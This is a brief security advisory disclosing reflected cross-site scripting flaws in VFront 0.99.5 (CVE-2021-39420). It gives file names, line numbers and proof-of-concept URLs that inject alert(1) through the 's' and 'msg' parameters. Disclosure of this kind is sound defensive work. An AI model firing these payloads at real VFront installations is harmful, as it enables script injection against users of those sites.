Your browser is unsupported

We recommend using the latest version of IE11, Edge, Chrome, Firefox or Safari.

Cross site scripting in VFront v0.99.5

Multiple cross site scripting vulnerabilities are present in VFront 0.99.5. The following is detailed information about these vulnerabilities:

file: search_all.php
line: 104
exploit: http://localhost/vfront-0.99.51/search_all.php?s=%22alert(1);

file: add.attach.php
line: 351
exploit: http://localhost/vfront-0.99.51/add.attach.php?feed=ko&id=1&t=tabella&msg=alert(1);
Notes: the parameter 't' must be the name of an existing table inside the database managed by vfront.

Above vulnerabilities are published at CVE-2021-39420

This vulnerability was detected as part of the DARPA CHESS program